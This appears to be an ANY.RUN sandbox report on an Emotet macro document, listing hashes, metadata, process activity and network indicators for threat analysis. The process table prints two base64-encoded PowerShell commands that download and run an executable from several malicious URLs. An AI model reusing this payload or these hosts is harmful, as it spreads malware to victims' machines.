analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Payment Report- Ref Id-Z953.doc

Full analysis: https://app.any.run/tasks/d07c6a01-c8ae-418c-bcf0-3af706c9dd58
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 14:25:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: microchip, Subject: Path, Author: Favian Hackett, Keywords: distributed, Comments: Borders, Template: Normal.dotm, Last Saved By: Stevie Hettinger, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 14:50:00 2019, Last Saved Time/Date: Tue Oct 8 14:50:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5:

F0A192D0F5FAA8B4439D4BC7CAD9FE39

SHA1:

39A23A3F4E0AEBC042640DD51134810AE0734AA0

SHA256:

7C99358A9100DF75F9BAB44700B907A5D04A1040814D15A221B0490AB5E55EB0

SSDEEP:

3072:qT+y1EVIKgdzSrGEKyIwLx3OLSLK7TwtGmN40GUJHEkSwKtyc3:qT+y1EVIKUzS3nLx3OIN40FK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2472)
      • powershell.exe (PID: 292)
    • Creates files in the user directory

      • powershell.exe (PID: 2472)
      • powershell.exe (PID: 292)
    • PowerShell script executed

      • powershell.exe (PID: 2472)
      • powershell.exe (PID: 292)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3172)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3172)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Cummerata
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 201
Paragraphs: 1
Lines: 1
Company: Bayer LLC
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 172
Words: 30
Pages: 1
ModifyDate: 2019:10:08 13:50:00
CreateDate: 2019:10:08 13:50:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Stevie Hettinger
Template: Normal.dotm
Comments: Borders
Keywords: distributed
Author: Favian Hackett
Subject: Path
Title: microchip
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
3
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3172"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Payment Report- Ref Id-Z953.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2472powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAAOAAwADkAOQBjADgANgAwADYAPQAnAGMANwB4ADMAMAA0ADAAMAA2ADQANwAzACcAOwAkAGIAOQA3ADYAMAAwADgANQAwAGMAeAAgAD0AIAAnADEANAAnADsAJABjADAAMQAxAHgAYwAyAGMAOQAzADAAMwAwAD0AJwBjAHgANgAxADAAeAA0ADUAMQA4ADgANAA3ACcAOwAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADkANwA2ADAAMAA4ADUAMABjAHgAKwAnAC4AZQB4AGUAJwA7ACQAYgA5ADkAMwAwADAAOAAzADAANQA4AD0AJwBjADAAeAB4AGMAOAA2ADYAMAAwAGMAJwA7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBiAGMATABJAEUAbgBUADsAJAB4AGIAMAA5ADcANQA4ADAAYgAxADAAPQAnAGgAdAB0AHAAOgAvAC8AaABvAG0AZQB0AG8AdwBuAGYAbABvAG8AcgBpAG4AZwB3AGYALgBjAG8AbQAvAGIAaQByAHQAaABkAGEAeQBfAHAAbwBwAHUAcAAvADEANABzAG0AMgBlAHUAaABhAC0AOQB5AG4AbgBkADcALQAwADcAOQAxAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAG8AcABpAGUAcgBtAGEAdABpAGMAYQAuAGMAbwBtAC8AcwBvAHgANgAyAGMALwBaAFQARwBaAGgARgAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAbgBoAGoAZQBuAGQAYQAuAG4AZQB0AC8AcgBvAGMAdwA4AGgAeQAvAGEAZAB4AGEANQAxAC0ANQBsADUAMABsADcAdABmAGwALQA5ADIAMwAvAEAAaAB0AHQAcAA6AC8ALwBsAGEAcABhAGsAbQBhAG4AaQBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASwBuAGoAdABaAGoALwBAAGgAdAB0AHAAOgAvAC8AbQBhAGkAcwB2AGkAcwBpAHQAYQBkAG8AcwAuAGMAbwBtAC4AYgByAC8AcABlAGQAaQBkAG8ALQBvAG4AbABpAG4AZQAvAGEAcgBtAC0AcABuADgALQA5ADAALwAnAC4AIgBTAHAAYABMAGkAVAAiACgAJwBAACcAKQA7ACQAeAAwADcAMwA5ADgAOAA3ADAAMgA4ADYAPQAnAHgAOAA3ADAAYwA4AGIANgAyADcAOAAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAA4ADQANwA4ADUAMAAwADAAYwBjADAAMAAgAGkAbgAgACQAeABiADAAOQA3ADUAOAAwAGIAMQAwACkAewB0AHIAeQB7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AC4AIgBkAG8AYABXAG4ATABPAGAAQQBkAGYAYABpAEwAZQAiACgAJAB4ADgANAA3ADgANQAwADAAMABjAGMAMAAwACwAIAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAkAGMANgAwADAANwA3ADUANQA4ADAANwA5ADAAPQAnAHgAOAA0ADYANAA2ADMAMABjADAAMABjADEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJAB4ADcANAAyADcAMwA0AGIAMwAxADkAeAApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA1ADMAMwAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABgAEEAcgBUACIAKAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAkAGMANQAwADgAYgB4ADMAYgAwADIAOAA3ADAAPQAnAHgAMAA0ADMANwAxAGIAMAAzADgAOAAnADsAYgByAGUAYQBrADsAJABiADUAMQA5ADAAMAAwADIAMQBiADcAYwAzAD0AJwB4ADAAOQAwAGIAMAAwADIAMAA0AGMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiAHgANQAzADQANQA2AHgAMAA4AGMAYwA9ACcAYwAwADEAMQAwADYAMAA0ADAAOQA2AHgAMAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
292powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAAOAAwADkAOQBjADgANgAwADYAPQAnAGMANwB4ADMAMAA0ADAAMAA2ADQANwAzACcAOwAkAGIAOQA3ADYAMAAwADgANQAwAGMAeAAgAD0AIAAnADEANAAnADsAJABjADAAMQAxAHgAYwAyAGMAOQAzADAAMwAwAD0AJwBjAHgANgAxADAAeAA0ADUAMQA4ADgANAA3ACcAOwAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADkANwA2ADAAMAA4ADUAMABjAHgAKwAnAC4AZQB4AGUAJwA7ACQAYgA5ADkAMwAwADAAOAAzADAANQA4AD0AJwBjADAAeAB4AGMAOAA2ADYAMAAwAGMAJwA7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBiAGMATABJAEUAbgBUADsAJAB4AGIAMAA5ADcANQA4ADAAYgAxADAAPQAnAGgAdAB0AHAAOgAvAC8AaABvAG0AZQB0AG8AdwBuAGYAbABvAG8AcgBpAG4AZwB3AGYALgBjAG8AbQAvAGIAaQByAHQAaABkAGEAeQBfAHAAbwBwAHUAcAAvADEANABzAG0AMgBlAHUAaABhAC0AOQB5AG4AbgBkADcALQAwADcAOQAxAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAG8AcABpAGUAcgBtAGEAdABpAGMAYQAuAGMAbwBtAC8AcwBvAHgANgAyAGMALwBaAFQARwBaAGgARgAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAbgBoAGoAZQBuAGQAYQAuAG4AZQB0AC8AcgBvAGMAdwA4AGgAeQAvAGEAZAB4AGEANQAxAC0ANQBsADUAMABsADcAdABmAGwALQA5ADIAMwAvAEAAaAB0AHQAcAA6AC8ALwBsAGEAcABhAGsAbQBhAG4AaQBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASwBuAGoAdABaAGoALwBAAGgAdAB0AHAAOgAvAC8AbQBhAGkAcwB2AGkAcwBpAHQAYQBkAG8AcwAuAGMAbwBtAC4AYgByAC8AcABlAGQAaQBkAG8ALQBvAG4AbABpAG4AZQAvAGEAcgBtAC0AcABuADgALQA5ADAALwAnAC4AIgBTAHAAYABMAGkAVAAiACgAJwBAACcAKQA7ACQAeAAwADcAMwA5ADgAOAA3ADAAMgA4ADYAPQAnAHgAOAA3ADAAYwA4AGIANgAyADcAOAAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAA4ADQANwA4ADUAMAAwADAAYwBjADAAMAAgAGkAbgAgACQAeABiADAAOQA3ADUAOAAwAGIAMQAwACkAewB0AHIAeQB7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AC4AIgBkAG8AYABXAG4ATABPAGAAQQBkAGYAYABpAEwAZQAiACgAJAB4ADgANAA3ADgANQAwADAAMABjAGMAMAAwACwAIAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAkAGMANgAwADAANwA3ADUANQA4ADAANwA5ADAAPQAnAHgAOAA0ADYANAA2ADMAMABjADAAMABjADEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJAB4ADcANAAyADcAMwA0AGIAMwAxADkAeAApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA1ADMAMwAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABgAEEAcgBUACIAKAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAkAGMANQAwADgAYgB4ADMAYgAwADIAOAA3ADAAPQAnAHgAMAA0ADMANwAxAGIAMAAzADgAOAAnADsAYgByAGUAYQBrADsAJABiADUAMQA5ADAAMAAwADIAMQBiADcAYwAzAD0AJwB4ADAAOQAwAGIAMAAwADIAMAA0AGMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiAHgANQAzADQANQA2AHgAMAA4AGMAYwA9ACcAYwAwADEAMQAwADYAMAA0ADAAOQA2AHgAMAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 896
Read events
1 351
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR657B.tmp.cvr
MD5:
SHA256:
2472powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3C8D3MQ1XPWG9HIXHVUM.temp
MD5:
SHA256:
292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2S3KUZ6V7NLQ7PZPGI9I.temp
MD5:
SHA256:
3172WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:89DBCE13376DEE79AC43FC4C4CD59750
SHA256:615C7B24D7A1E4906175428D355B92E4F6C286ADE15264D81E31D41885394A25
3172WINWORD.EXEC:\Users\admin\Desktop\~$yment Report- Ref Id-Z953.docpgc
MD5:1A50F8724FB8688E6DF02113AB1DC1B0
SHA256:4817D99872E224BD9840800DCA06125B2F94635D752A9F203DC61E32757C2053
3172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6BCDD18.wmfwmf
MD5:332994473FF41EE75665218B85C65B01
SHA256:AC1CF93A9E38128A395CBC08A22AD28623B6BB94351F1D78BDD8F4AF35BEFD55
3172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6CAFE4.wmfwmf
MD5:276491F4C73C63BB8D84001E782AC996
SHA256:22CA0E530DE62AAE7EDB15A8F92BF974620B1F9BECD6B088A3F51BFF23280F4C
2472powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18729b.TMPbinary
MD5:A272B20D1454EFE23A324E582F0E701D
SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051
3172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\770A6B.wmfwmf
MD5:90B4B4871390DC132DE0712EBE9DEB37
SHA256:BC1FC36C65B9F2D7572D58505B921BBAFCB6C8F998D599F1F3028F553CF516FB
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:CA0D32100CF108F5B6C0ED8903EFD9CE
SHA256:DA1718EC8FD0E0275690EF9802363F9C160F2756473CC9D84A5C61E550EEB88E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2472
powershell.exe
GET
166.62.112.199:80
http://hometownflooringwf.com/birthday_popup/14sm2euha-9ynnd7-0791/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2472
powershell.exe
166.62.112.199:80
hometownflooringwf.com
GoDaddy.com, LLC
US
malicious

DNS requests

Domain
IP
Reputation
hometownflooringwf.com
  • 166.62.112.199
malicious

Threats

No threats detected
No debug info